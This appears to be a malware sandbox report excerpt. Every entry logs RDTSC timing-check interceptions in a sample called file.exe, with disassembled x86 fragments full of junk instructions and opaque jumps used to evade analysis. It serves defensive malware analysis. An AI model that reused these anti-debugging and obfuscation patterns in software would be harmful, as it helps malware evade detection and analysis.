                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 75F2E2 second address: 75F2EB instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 762D0A second address: 762D69 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F402CC7E506h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jbe 00007F402CC7E508h 0x00000010 popad 0x00000011 push eax 0x00000012 pushad 0x00000013 jng 00007F402CC7E50Ch 0x00000019 js 00007F402CC7E506h 0x0000001f jmp 00007F402CC7E511h 0x00000024 popad 0x00000025 nop 0x00000026 mov edx, eax 0x00000028 push 00000000h 0x0000002a or dx, 3CE9h 0x0000002f mov dword ptr [ebp+122D2DADh], edi 0x00000035 call 00007F402CC7E509h 0x0000003a jmp 00007F402CC7E50Ch 0x0000003f push eax 0x00000040 push eax 0x00000041 push edx 0x00000042 push eax 0x00000043 push edx 0x00000044 push eax 0x00000045 push edx 0x00000046 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 762D69 second address: 762D6D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 762D6D second address: 762D77 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F402CC7E506h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 762D77 second address: 762DCB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 jmp 00007F402CDD4F64h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov eax, dword ptr [esp+04h] 0x00000011 push eax 0x00000012 jmp 00007F402CDD4F62h 0x00000017 pop eax 0x00000018 mov eax, dword ptr [eax] 0x0000001a pushad 0x0000001b push eax 0x0000001c pushad 0x0000001d popad 0x0000001e pop eax 0x0000001f jng 00007F402CDD4F5Ch 0x00000025 jns 00007F402CDD4F56h 0x0000002b popad 0x0000002c mov dword ptr [esp+04h], eax 0x00000030 push eax 0x00000031 push edx 0x00000032 pushad 0x00000033 pushad 0x00000034 popad 0x00000035 pushad 0x00000036 popad 0x00000037 popad 0x00000038 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 762DCB second address: 762DD6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jo 00007F402CC7E506h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 762DD6 second address: 762E90 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pop eax 0x00000008 movsx edi, si 0x0000000b or dword ptr [ebp+122D2CD2h], ebx 0x00000011 push 00000003h 0x00000013 jmp 00007F402CDD4F5Eh 0x00000018 push 00000000h 0x0000001a movzx edi, bx 0x0000001d jl 00007F402CDD4F59h 0x00000023 movzx edi, dx 0x00000026 push 00000003h 0x00000028 mov di, 585Ch 0x0000002c push 93FE3B5Fh 0x00000031 pushad 0x00000032 pushad 0x00000033 jmp 00007F402CDD4F63h 0x00000038 push edx 0x00000039 pop edx 0x0000003a popad 0x0000003b jmp 00007F402CDD4F69h 0x00000040 popad 0x00000041 add dword ptr [esp], 2C01C4A1h 0x00000048 jno 00007F402CDD4F62h 0x0000004e lea ebx, dword ptr [ebp+12454BEEh] 0x00000054 push 00000000h 0x00000056 push ebx 0x00000057 call 00007F402CDD4F58h 0x0000005c pop ebx 0x0000005d mov dword ptr [esp+04h], ebx 0x00000061 add dword ptr [esp+04h], 00000014h 0x00000069 inc ebx 0x0000006a push ebx 0x0000006b ret 0x0000006c pop ebx 0x0000006d ret 0x0000006e xor esi, dword ptr [ebp+122D2B3Fh] 0x00000074 push eax 0x00000075 push eax 0x00000076 push edx 0x00000077 pushad 0x00000078 jl 00007F402CDD4F56h 0x0000007e pushad 0x0000007f popad 0x00000080 popad 0x00000081 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 762F05 second address: 762FBD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F402CC7E50Fh 0x00000009 popad 0x0000000a mov dword ptr [esp], eax 0x0000000d call 00007F402CC7E515h 0x00000012 pop esi 0x00000013 push 00000000h 0x00000015 push 00000000h 0x00000017 push ecx 0x00000018 call 00007F402CC7E508h 0x0000001d pop ecx 0x0000001e mov dword ptr [esp+04h], ecx 0x00000022 add dword ptr [esp+04h], 0000001Ch 0x0000002a inc ecx 0x0000002b push ecx 0x0000002c ret 0x0000002d pop ecx 0x0000002e ret 0x0000002f stc 0x00000030 call 00007F402CC7E509h 0x00000035 push edi 0x00000036 jmp 00007F402CC7E50Bh 0x0000003b pop edi 0x0000003c push eax 0x0000003d pushad 0x0000003e jbe 00007F402CC7E50Ch 0x00000044 jmp 00007F402CC7E513h 0x00000049 popad 0x0000004a mov eax, dword ptr [esp+04h] 0x0000004e push esi 0x0000004f jne 00007F402CC7E50Ch 0x00000055 pop esi 0x00000056 mov eax, dword ptr [eax] 0x00000058 jno 00007F402CC7E50Eh 0x0000005e mov dword ptr [esp+04h], eax 0x00000062 push eax 0x00000063 push edx 0x00000064 push eax 0x00000065 pushad 0x00000066 popad 0x00000067 pop eax 0x00000068 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 763163 second address: 76316D instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F402CDD4F5Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 76316D second address: 7631AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 xor dword ptr [esp], 041DE98Bh 0x0000000d movsx esi, bx 0x00000010 push 00000003h 0x00000012 ja 00007F402CC7E50Ch 0x00000018 push 00000000h 0x0000001a mov edx, dword ptr [ebp+122D2A9Bh] 0x00000020 push 00000003h 0x00000022 pushad 0x00000023 or bh, 00000053h 0x00000026 popad 0x00000027 call 00007F402CC7E509h 0x0000002c push eax 0x0000002d push edx 0x0000002e jp 00007F402CC7E508h 0x00000034 pushad 0x00000035 popad 0x00000036 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7631AD second address: 76321C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F402CDD4F61h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F402CDD4F61h 0x0000000f mov eax, dword ptr [esp+04h] 0x00000013 pushad 0x00000014 pushad 0x00000015 jmp 00007F402CDD4F5Dh 0x0000001a jc 00007F402CDD4F56h 0x00000020 popad 0x00000021 push edi 0x00000022 jg 00007F402CDD4F56h 0x00000028 pop edi 0x00000029 popad 0x0000002a mov eax, dword ptr [eax] 0x0000002c jns 00007F402CDD4F69h 0x00000032 mov dword ptr [esp+04h], eax 0x00000036 push eax 0x00000037 push edx 0x00000038 push eax 0x00000039 push edx 0x0000003a push edi 0x0000003b pop edi 0x0000003c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 76321C second address: 763226 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F402CC7E506h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 763226 second address: 76327B instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jmp 00007F402CDD4F62h 0x00000008 pop ebx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop eax 0x0000000c push 00000000h 0x0000000e push edx 0x0000000f call 00007F402CDD4F58h 0x00000014 pop edx 0x00000015 mov dword ptr [esp+04h], edx 0x00000019 add dword ptr [esp+04h], 00000017h 0x00000021 inc edx 0x00000022 push edx 0x00000023 ret 0x00000024 pop edx 0x00000025 ret 0x00000026 or edi, dword ptr [ebp+122D2A1Fh] 0x0000002c lea ebx, dword ptr [ebp+12454C02h] 0x00000032 pushad 0x00000033 xor ch, FFFFFFA0h 0x00000036 mov dword ptr [ebp+122D1B19h], ebx 0x0000003c popad 0x0000003d xchg eax, ebx 0x0000003e pushad 0x0000003f push eax 0x00000040 push edx 0x00000041 push eax 0x00000042 push edx 0x00000043 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 76327B second address: 76327F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 76327F second address: 76328C instructions: 0x00000000 rdtsc 0x00000002 jl 00007F402CDD4F56h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 76328C second address: 7632AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F402CC7E506h 0x0000000a popad 0x0000000b popad 0x0000000c push eax 0x0000000d pushad 0x0000000e jns 00007F402CC7E50Ch 0x00000014 jnp 00007F402CC7E506h 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7632AA second address: 7632AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7632AE second address: 7632B2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 781E9E second address: 781EA4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7821A4 second address: 7821A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7821A8 second address: 7821B9 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jnc 00007F402CDD4F56h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7821B9 second address: 7821BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7821BE second address: 7821CF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jng 00007F402CDD4F56h 0x00000009 jne 00007F402CDD4F56h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7821CF second address: 7821D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 782342 second address: 782346 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 782346 second address: 782352 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F402CC7E506h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7829C7 second address: 7829E4 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F402CDD4F63h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7829E4 second address: 782A01 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F402CC7E514h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 782A01 second address: 782A07 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 782B59 second address: 782B5D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 782B5D second address: 782B6D instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jc 00007F402CDD4F56h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 782B6D second address: 782B71 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 782B71 second address: 782B91 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F402CDD4F69h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 782CFB second address: 782D01 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7832B0 second address: 7832B4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7832B4 second address: 7832D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 pushad 0x00000008 popad 0x00000009 pop edi 0x0000000a jne 00007F402CC7E508h 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F402CC7E510h 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 783999 second address: 7839A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F402CDD4F56h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7839A3 second address: 7839A7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7839A7 second address: 7839B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jne 00007F402CDD4F5Ch 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7839B5 second address: 7839DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 jmp 00007F402CC7E511h 0x0000000a pushad 0x0000000b popad 0x0000000c pop ebx 0x0000000d popad 0x0000000e jnp 00007F402CC7E553h 0x00000014 push eax 0x00000015 push edx 0x00000016 jne 00007F402CC7E506h 0x0000001c pushad 0x0000001d popad 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 758BB2 second address: 758BB8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 758BB8 second address: 758BC2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 758BC2 second address: 758BE3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F402CDD4F56h 0x0000000a popad 0x0000000b js 00007F402CDD4F5Ch 0x00000011 jng 00007F402CDD4F56h 0x00000017 popad 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b pushad 0x0000001c popad 0x0000001d pushad 0x0000001e popad 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 758BE3 second address: 758BEA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 788CEF second address: 788CF3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 788CF3 second address: 788D00 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 78DFED second address: 78E005 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F402CDD4F56h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push edx 0x0000000e pop edx 0x0000000f push ecx 0x00000010 pop ecx 0x00000011 jl 00007F402CDD4F56h 0x00000017 popad 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 78E005 second address: 78E032 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F402CC7E517h 0x00000008 jmp 00007F402CC7E511h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 78E032 second address: 78E051 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F402CDD4F68h 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 78D6EA second address: 78D6EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 78D6EE second address: 78D702 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F402CDD4F5Eh 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 78D829 second address: 78D82F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 78D82F second address: 78D834 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 78DB27 second address: 78DB2D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 78DB2D second address: 78DB48 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F402CDD4F64h 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 78DB48 second address: 78DB59 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jp 00007F402CC7E508h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 78DB59 second address: 78DB5E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 78DB5E second address: 78DB68 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 push edi 0x00000007 pop edi 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 78DCBD second address: 78DCC8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F402CDD4F56h 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 78DCC8 second address: 78DCFF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jbe 00007F402CC7E506h 0x00000009 jmp 00007F402CC7E518h 0x0000000e jmp 00007F402CC7E514h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 78DE63 second address: 78DE7C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F402CDD4F65h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 78DE7C second address: 78DE9A instructions: 0x00000000 rdtsc 0x00000002 jne 00007F402CC7E506h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push ebx 0x00000010 pop ebx 0x00000011 pushad 0x00000012 popad 0x00000013 pop eax 0x00000014 push edx 0x00000015 pushad 0x00000016 popad 0x00000017 jl 00007F402CC7E506h 0x0000001d pop edx 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 78DE9A second address: 78DEBB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007F402CDD4F68h 0x0000000a push esi 0x0000000b pop esi 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 791258 second address: 79126D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 pushad 0x00000009 push ecx 0x0000000a pushad 0x0000000b popad 0x0000000c pop ecx 0x0000000d push eax 0x0000000e push edx 0x0000000f jo 00007F402CC7E506h 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 79137B second address: 79138F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 mov dword ptr [esp+04h], eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jp 00007F402CDD4F56h 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 79138F second address: 791393 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 79211E second address: 792128 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnp 00007F402CDD4F56h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7922A9 second address: 7922B3 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F402CC7E50Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 793307 second address: 79330B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7931C1 second address: 7931C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 79330B second address: 793394 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 mov dword ptr [esp], eax 0x0000000a push 00000000h 0x0000000c push ebp 0x0000000d call 00007F402CDD4F58h 0x00000012 pop ebp 0x00000013 mov dword ptr [esp+04h], ebp 0x00000017 add dword ptr [esp+04h], 00000014h 0x0000001f inc ebp 0x00000020 push ebp 0x00000021 ret 0x00000022 pop ebp 0x00000023 ret 0x00000024 mov dword ptr [ebp+122D1BF2h], eax 0x0000002a mov dword ptr [ebp+122D1BD6h], edx 0x00000030 push 00000000h 0x00000032 push 00000000h 0x00000034 push esi 0x00000035 call 00007F402CDD4F58h 0x0000003a pop esi 0x0000003b mov dword ptr [esp+04h], esi 0x0000003f add dword ptr [esp+04h], 00000018h 0x00000047 inc esi 0x00000048 push esi 0x00000049 ret 0x0000004a pop esi 0x0000004b ret 0x0000004c push edi 0x0000004d mov esi, 19F20691h 0x00000052 pop esi 0x00000053 mov edi, dword ptr [ebp+122D2A47h] 0x00000059 push 00000000h 0x0000005b jmp 00007F402CDD4F67h 0x00000060 xchg eax, ebx 0x00000061 push eax 0x00000062 push edx 0x00000063 jng 00007F402CDD4F5Ch 0x00000069 jp 00007F402CDD4F56h 0x0000006f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7931C6 second address: 7931E2 instructions: 0x00000000 rdtsc 0x00000002 js 00007F402CC7E508h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F402CC7E50Dh 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 793394 second address: 793399 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7931E2 second address: 7931E7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 793C1B second address: 793C20 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 794D2D second address: 794D31 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 796390 second address: 796394 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 796394 second address: 7963AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 pushad 0x00000009 jmp 00007F402CC7E50Dh 0x0000000e push eax 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7963AD second address: 7963F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 popad 0x00000006 nop 0x00000007 or dword ptr [ebp+122D1EE9h], eax 0x0000000d push 00000000h 0x0000000f jmp 00007F402CDD4F67h 0x00000014 push 00000000h 0x00000016 movzx esi, dx 0x00000019 mov esi, dword ptr [ebp+122D299Bh] 0x0000001f xchg eax, ebx 0x00000020 jmp 00007F402CDD4F5Fh 0x00000025 push eax 0x00000026 push ebx 0x00000027 push edi 0x00000028 push eax 0x00000029 push edx 0x0000002a rdtsc
